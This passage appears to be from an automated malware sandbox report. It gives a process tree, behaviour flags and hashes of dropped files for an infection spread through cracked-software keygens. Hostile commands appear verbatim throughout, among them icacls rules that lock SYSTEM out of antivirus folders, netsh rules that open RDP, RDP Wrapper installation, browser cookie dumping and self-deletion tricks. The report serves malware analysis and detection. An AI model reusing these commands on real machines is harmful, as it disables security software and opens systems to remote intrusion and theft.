        icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:5004
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
      PID:5016
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:4140
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
      PID:1280
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
        Modifies file permissions
        PID:4116
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
      PID:4120
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
        Modifies file permissions
        PID:2352
    • C:\Programdata\Install\utorrent.exe
      C:\Programdata\Install\utorrent.exe
      Executes dropped EXE
      Drops file in Program Files directory
      NTFS ADS
      Suspicious use of SetWindowsHookEx
      PID:576
      • C:\ProgramData\WindowsTask\azur.exe
        C:\ProgramData\WindowsTask\azur.exe
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        Suspicious use of SetWindowsHookEx
        PID:3548
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "azur.exe"
          PID:3280
          • C:\Windows\SysWOW64\timeout.exe
            C:\Windows\system32\timeout.exe 3
            Delays execution with timeout.exe
            PID:5080
      • C:\ProgramData\WindowsTask\system.exe
        C:\ProgramData\WindowsTask\system.exe
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        PID:4416
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\selfDel.bat" "
          PID:960
      • C:\ProgramData\RDPWinst.exe
        C:\ProgramData\RDPWinst.exe -u
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        PID:4216
        • C:\Windows\SYSTEM32\netsh.exe
          netsh advfirewall firewall delete rule name="Remote Desktop"
          PID:5792
      • C:\ProgramData\RDPWinst.exe
        C:\ProgramData\RDPWinst.exe -i
        Executes dropped EXE
        Modifies WinLogon
        Drops file in Program Files directory
        Suspicious use of SetWindowsHookEx
        PID:5316
        • C:\Windows\SYSTEM32\netsh.exe
          netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
          PID:5300
  • C:\ProgramData\Windows\rutserv.exe
    C:\ProgramData\Windows\rutserv.exe
    Executes dropped EXE
    Drops file in System32 directory
    Suspicious behavior: EnumeratesProcesses
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    PID:2228
  • C:\Programdata\RealtekHD\taskhost.exe
    C:\Programdata\RealtekHD\taskhost.exe
    Executes dropped EXE
    Drops file in System32 directory
    Suspicious behavior: GetForegroundWindowSpam
    PID:4244
    • C:\Programdata\WindowsTask\winlogon.exe
      C:\Programdata\WindowsTask\winlogon.exe
      Executes dropped EXE
      PID:4656
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /C schtasks /query /fo list
        PID:4672
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /query /fo list
          PID:4868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ipconfig /flushdns
      PID:4160
      • C:\Windows\system32\ipconfig.exe
        ipconfig /flushdns
        Gathers network information
        PID:5636
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c gpupdate /force
      PID:2716
      • C:\Windows\system32\gpupdate.exe
        gpupdate /force
        PID:4536
  • C:\Users\Admin\Desktop\api.exe
    "C:\Users\Admin\Desktop\api.exe"
    Executes dropped EXE
    Enumerates connected drives
    Writes to the Master Boot Record (MBR)
    Suspicious behavior: AddClipboardFormatListener
    Suspicious behavior: GetForegroundWindowSpam
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of FindShellTrayWindow
    Suspicious use of SendNotifyMessage
    Suspicious use of SetWindowsHookEx
    PID:1620
    • C:\Windows\SysWOW64\LaunchWinApp.exe
      "C:\Windows\system32\LaunchWinApp.exe" "https://adlice.com/thanks-downloading-diag/?utm_campaign=diag&utm_source=soft&utm_medium=btn"
      PID:5464
  • C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe
    "C:\Users\Admin\Desktop\Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe"
    Executes dropped EXE
    PID:2304
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      PID:5052
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\intro.exe
        intro.exe 1O5ZF
        Executes dropped EXE
        PID:5136
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        Executes dropped EXE
        PID:5216
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          Executes dropped EXE
          Suspicious use of SetThreadContext
          PID:5728
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            Executes dropped EXE
            PID:5868
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
        keygen-step-1.exe
        Executes dropped EXE
        PID:5252
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
        keygen-step-4.exe
        Executes dropped EXE
        PID:5448
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\002.exe"
          Executes dropped EXE
          Suspicious use of SetWindowsHookEx
          PID:5720
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
          Executes dropped EXE
          Loads dropped DLL
          PID:5948
          • C:\Users\Admin\AppData\Local\Temp\sib5F11.tmp\0\setup.exe
            "C:\Users\Admin\AppData\Local\Temp\sib5F11.tmp\0\setup.exe" -s
            Executes dropped EXE
            Drops file in Program Files directory
            PID:6140
            • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe
              "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
              Executes dropped EXE
              Checks whether UAC is enabled
              Writes to the Master Boot Record (MBR)
              Suspicious use of NtSetInformationThreadHideFromDebugger
              Modifies system certificate store
              Suspicious use of SetWindowsHookEx
              PID:5192
              • C:\Windows\SysWOW64\msiexec.exe
                msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
                Enumerates connected drives
                Suspicious use of FindShellTrayWindow
                PID:6020
              • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 0011 installp1
                Executes dropped EXE
                Checks whether UAC is enabled
                Writes to the Master Boot Record (MBR)
                Suspicious use of SetThreadContext
                Checks SCSI registry key(s)
                Suspicious use of SetWindowsHookEx
                PID:5304
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:3312
                • C:\Users\Admin\AppData\Roaming\1605810348493.exe
                  "C:\Users\Admin\AppData\Roaming\1605810348493.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810348493.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5724
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:5940
                • C:\Users\Admin\AppData\Roaming\1605810353930.exe
                  "C:\Users\Admin\AppData\Roaming\1605810353930.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810353930.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5632
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:5424
                • C:\Users\Admin\AppData\Roaming\1605810359509.exe
                  "C:\Users\Admin\AppData\Roaming\1605810359509.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810359509.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5392
                • C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  Suspicious use of SetWindowsHookEx
                  PID:4836
                • C:\Users\Admin\AppData\Roaming\1605810362353.exe
                  "C:\Users\Admin\AppData\Roaming\1605810362353.exe" /sjson "C:\Users\Admin\AppData\Roaming\1605810362353.txt"
                  Executes dropped EXE
                  Suspicious use of SetWindowsHookEx
                  PID:5928
              • C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe
                C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe 200 installp1
                Executes dropped EXE
                Checks whether UAC is enabled
                Writes to the Master Boot Record (MBR)
                Checks SCSI registry key(s)
                Suspicious use of SetWindowsHookEx
                PID:5372
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  PID:4004
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im chrome.exe
                    Kills process with taskkill
                    PID:5360
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\97535F5358BB4449.exe"
                  PID:5972
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    Runs ping.exe
                    PID:4880
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe"
                PID:4824
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  Runs ping.exe
                  PID:5348
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\jg2_2qua.exe"
          Executes dropped EXE
          Checks whether UAC is enabled
          PID:4948
        • C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX2\hjjgaa.exe"
          Executes dropped EXE
          Adds Run key to start application
          PID:4056
          • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
            Executes dropped EXE
            PID:6120
          • C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe
            C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt
            Executes dropped EXE
            PID:6112
  • C:\Users\Admin\Desktop\OnlineInstaller.exe
    "C:\Users\Admin\Desktop\OnlineInstaller.exe"
    Executes dropped EXE
    Checks for any installed AV software in registry
    Suspicious use of AdjustPrivilegeToken
    Suspicious use of SetWindowsHookEx
    PID:4404
    • C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp
      C:\Users\Admin\AppData\Local\Temp\OnlineInstaller.tmp -install
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4856
  • C:\Windows\system32\AUDIODG.EXE
    C:\Windows\system32\AUDIODG.EXE 0x3c4
    Suspicious use of AdjustPrivilegeToken
    PID:4780
  • C:\Users\Admin\Desktop\42f972925508a82236e8533567487761.exe
    "C:\Users\Admin\Desktop\42f972925508a82236e8533567487761.exe"
    Executes dropped EXE
    PID:4224
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k networkservice -s TermService
    PID:4284
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    PID:4800
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Suspicious use of AdjustPrivilegeToken
    PID:4580
  • C:\Windows\System32\svchost.exe
    C:\Windows\System32\svchost.exe -k NetworkService -s TermService
    Loads dropped DLL
    PID:4492
  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
    Drops file in Windows directory
    Modifies registry class
    Suspicious use of SetWindowsHookEx
    PID:5408
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    Enumerates connected drives
    PID:5456
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding B1892284D68E555EFE733C0196F8E52E C
      Loads dropped DLL
      PID:4424
  • C:\Windows\system32\browser_broker.exe
    C:\Windows\system32\browser_broker.exe -Embedding
    PID:5760
  • C:\Programdata\RealtekHD\taskhostw.exe
    C:\Programdata\RealtekHD\taskhostw.exe
    Executes dropped EXE
    PID:5712
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    PID:5272
Network
Replay Monitor
00:00 00:00
Downloads
  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files (x86)\dz7d9shn0mvi\aliens.exe

  • C:\Program Files\Common Files\System\iediagcmd.exe

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Program Files\RDP Wrapper\rdpwrap.dll

  • C:\Program Files\RDP Wrapper\rdpwrap.ini

  • C:\Program Files\RDP Wrapper\rdpwrap.ini

    MD5

    dddd741ab677bdac8dcd4fa0dda05da2

    SHA1

    69d328c70046029a1866fd440c3e4a63563200f9

    SHA256

    7d5655d5ec4defc2051aa5f582fac1031b142040c8eea840ff88887fe27b7668

    SHA512

    6106252c718f7ca0486070c6f6c476bd47e6ae6a799cffd3fb437a5ce2b2a904e9cbe17342351353c594d7a8ae0ef0327752ff977dee1e69f0be7dc8e55cf4ec

  • C:\ProgramData\Microsoft\Intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\R8.exe

    MD5

    ad95d98c04a3c080df33ed75ad38870f

    SHA1

    abbb43f7b7c86d7917d4582e47245a40ca3f33c0

    SHA256

    40d4931bbb3234a2e399e2e3e0dcfe4b7b05362c58d549569f2888d5b210ebbd

    SHA512

    964e93aeec90ce5ddaf0f6440afb3ed27523dfcddcdfd4574b62ef32763cb9e167691b33bfc2e7b62a98ff8df2070bf7ae53dafc93a52ed6cbe9c2ca1563c5ed

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

    MD5

    23d51bd68920fdfd90809197b8c364ff

    SHA1

    5eee02db6087702db49acb2619e37d74833321d9

    SHA256

    0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1

    SHA512

    3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7

  • C:\ProgramData\Microsoft\Intel\taskhost.exe

    MD5

    23d51bd68920fdfd90809197b8c364ff

    SHA1

    5eee02db6087702db49acb2619e37d74833321d9

    SHA256

    0e45de428064f864f467f000be38db66ee55d22ddc259d86a5f6a038088cabd1

    SHA512

    3159ccf3c21490e8841dcf950a3fc7359c3ff11a8db851f0b288a070ada4ba682c102668c8d1e922ea046f49cce819ba9bb9e90317e6f3fea1fa7a1799faf9d7

  • C:\ProgramData\Microsoft\Intel\wini.exe

    MD5

    204d1fc66f62b26d0b5e00b092992d7d

    SHA1

    e9a179cb62d7fddf9d4345d76673c49c88f05536

    SHA256

    69c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b

    SHA512

    cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f

  • C:\ProgramData\Microsoft\Intel\wini.exe

    MD5

    204d1fc66f62b26d0b5e00b092992d7d

    SHA1

    e9a179cb62d7fddf9d4345d76673c49c88f05536

    SHA256

    69c6fb12071b3672e14c9187b3a9e9b9f59437f2fc3ffb1b2f7cc7f78b97455b

    SHA512

    cdb03b747a120872b984242a9e7d0ee9cc1b89f0d0fcc503a0d8d79b3f73f88acc5532f3bb42ee4cddb054b791baa672e5cf5fea74acda6b6c686768e1152a4f

  • C:\ProgramData\RDPWinst.exe

    MD5

    3288c284561055044c489567fd630ac2

    SHA1

    11ffeabbe42159e1365aa82463d8690c845ce7b7

    SHA256

    ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

    SHA512

    c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

  • C:\ProgramData\RDPWinst.exe

    MD5

    3288c284561055044c489567fd630ac2

    SHA1

    11ffeabbe42159e1365aa82463d8690c845ce7b7

    SHA256

    ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

    SHA512

    c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

  • C:\ProgramData\RDPWinst.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

  • C:\ProgramData\RealtekHD\taskhost.exe

    MD5

    676f368fed801fb2a5350f3bdc631d0b

    SHA1

    e129c24447d7986fb0ed1725b240c00d4d9489ea

    SHA256

    5c4eaa5bce7f19f29013685899d8205245f4a5a7728e770458619510e661b145

    SHA512

    d4a3fb68eea4bcad55657a17ff8474d220e6e6cd113cb42d4d00a698e59941b1dab33bb626901fedeb312dee0c0a0559f9e4a75761028eab69a686c61e81160d

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\RealtekHD\taskhostw.exe

    MD5

    21feb5dccba8bf69df9a2307d206d033

    SHA1

    65fc243a3530225903bf422f19ffd0e3aad66f03

    SHA256

    ff0140dbaa83c7f64b2e86f43cb5f54584b31b371b6c984d8b214fe35eb8e493

    SHA512

    b5a25a95cf6d9dcac0de27f253f66cbba76029d6cb9311f41f351d7bb9d556d93023e04e922b42ebd0e47e68e84d2d8c50a37d9c2380524b22d9066079dedaca

  • C:\ProgramData\RealtekHD\taskhostw.exe

  • C:\ProgramData\WindowsTask\MicrosoftHost.exe

    MD5

    191f67bf26f68cef47359b43facfa089

    SHA1

    94529e37aa179e44e22e9ccd6ee0de8a49a8f2fc

    SHA256

    2144c0d5d80613e66c393271c11c374afc57ae910d455bed661bb5cb04c1d2c5

    SHA512

    7d8de83158acf23b8a3fda50106e36f59c3888c99e45b8fa46599c45f6e80e3b6e4cdcbbf440f442446a93933685e086925338320716d3919a9033118425102b

  • C:\ProgramData\WindowsTask\WinRing0x64.sys

  • C:\ProgramData\WindowsTask\azur.exe

    MD5

    bfa81a720e99d6238bc6327ab68956d9

    SHA1

    c7039fadffccb79534a1bf547a73500298a36fa0

    SHA256

    222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

    SHA512

    5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

  • C:\ProgramData\WindowsTask\azur.exe

    MD5

    bfa81a720e99d6238bc6327ab68956d9

    SHA1

    c7039fadffccb79534a1bf547a73500298a36fa0

    SHA256

    222a8bb1b3946ff0569722f2aa2af728238778b877cebbda9f0b10703fc9d09f

    SHA512

    5ba1fab68a647e0a0b03d8fba5ab92f4bdec28fb9c1657e1832cfd54ee7b5087ce181b1eefce0c14b603576c326b6be091c41fc207b0068b9032502040d18bab

  • C:\ProgramData\WindowsTask\system.exe

    MD5

    49e31c4bcd9f86ba897dc7e64176dc50

    SHA1

    cbf0134bd25fd631c3baae23b9e5c79dffef870a

    SHA256

    006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

    SHA512

    b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

  • C:\ProgramData\WindowsTask\system.exe

    MD5

    49e31c4bcd9f86ba897dc7e64176dc50

    SHA1

    cbf0134bd25fd631c3baae23b9e5c79dffef870a

    SHA256

    006c8ee1ba292e19b1ee6d74d2eb3f8ca8f2c5a9e51a12b37501ea658e10c641

    SHA512

    b1ffb2eb281bd773eecfbf6df1d92073cba3298749736c775a82974f80cc938ffcf281a9cfd6bb0f8aa9961f9ee92e9a641cddae4f9e141190fdc569a24b1d70

  • C:\ProgramData\WindowsTask\update.exe

    MD5

    c830b8a074455cc0777ed5bc0bfd2678

    SHA1

    bff2a96c092f8c5620a4d4621343594cd8892615

    SHA256

    3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

    SHA512

    c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

  • C:\ProgramData\WindowsTask\update.exe

    MD5

    c830b8a074455cc0777ed5bc0bfd2678

    SHA1

    bff2a96c092f8c5620a4d4621343594cd8892615

    SHA256

    3567966f3f2aa2e44d42b4bd3adae3c5bb121296c1901f69547ad36cd0d0f5f9

    SHA512

    c90eb64fee3ab08b8f23fc8958fd7f69c1decbe4295d071d07dc427042e53796edf511e7d61600dcdb7d7429925135f42752e199785049134ac7c0dbbf15f541

  • C:\ProgramData\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\WindowsTask\winlogon.exe

    MD5

    ec0f9398d8017767f86a4d0e74225506

    SHA1

    720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

    SHA256

    870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

    SHA512

    d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

  • C:\ProgramData\Windows\install.vbs

    MD5

    5e36713ab310d29f2bdd1c93f2f0cad2

    SHA1

    7e768cca6bce132e4e9132e8a00a1786e6351178

    SHA256

    cd8df8b0c43c36aabb0a960e4444b000a04eb513f0b34e12dbfd098944e40931

    SHA512

    8e5cf90470163143aee75b593e52fcc39e6477cd69a522ee77fa2589ea22b8a3a1c23614d3a677c8017fba0bf4b320a4e47c56a9a7f176dbf51db88d9d8e52c1

  • C:\ProgramData\Windows\reg1.reg

    MD5

    4dc0fba4595ad8fe1f010f9079f59dd3

    SHA1

    b3a54e99afc124c64978d48afca2544d75e69da5

    SHA256

    b2fd919e2acd61601c3341179a20ce1d0c2074e8907692dc83d55ba6c6b3eb3a

    SHA512

    fb0855ad6a33a3efc44453f2a5624e0fc87818bf10d13a87d168be3e9c69b7c8dffb39a34193ab134f42b0af527566e74bada71742c09f90ffd60334ba5143b8

  • C:\ProgramData\Windows\reg2.reg

    MD5

    6a5d2192b8ad9e96a2736c8b0bdbd06e

    SHA1

    235a78495192fc33f13af3710d0fe44e86a771c9

    SHA256

    4ae04a85412ec3daa0fb33f21ed4eb3c4864c3668b95712be9ec36ef7658422a

    SHA512

    411204a0a1cdbe610830fb0be09fd86c579bb5cccf46e2e74d075a5693fe7924e1e2ba121aa824af66c7521fcc452088b2301321d9d7eb163bee322f2f58640d

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\rutserv.exe

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

  • C:\ProgramData\Windows\vp8decoder.dll

    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

  • C:\ProgramData\Windows\vp8encoder.dll

    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

    SHA512

    389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

  • C:\ProgramData\Windows\winit.exe

    MD5

    701f0baf56e40757b2bf6dabcdcfc7aa

    SHA1

    cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4

    SHA256

    8e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370

    SHA512

    e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190

  • C:\ProgramData\Windows\winit.exe

    MD5

    701f0baf56e40757b2bf6dabcdcfc7aa

    SHA1

    cc6a13d816a7bfc7aab2ae2bf9ccfc0b7e1180d4

    SHA256

    8e292fcc70d679093cff331650389d357d85367d910d9ed6ea18722b7e7de370

    SHA512

    e448efbb8771db86488a71c87fd2f7f2e8eef4899c07b9d4f0e2157bed97bb2f6f52539a8719e848ccc3ee3cb842646fd49221e74ed16d2f8069760c66097190

  • C:\ProgramData\install\cheat.exe

    MD5

    b8aa5d85128fe955865bfd130fd6ed63

    SHA1

    51119e37d2dc17eefdb6edb5d032fb77949038b8

    SHA256

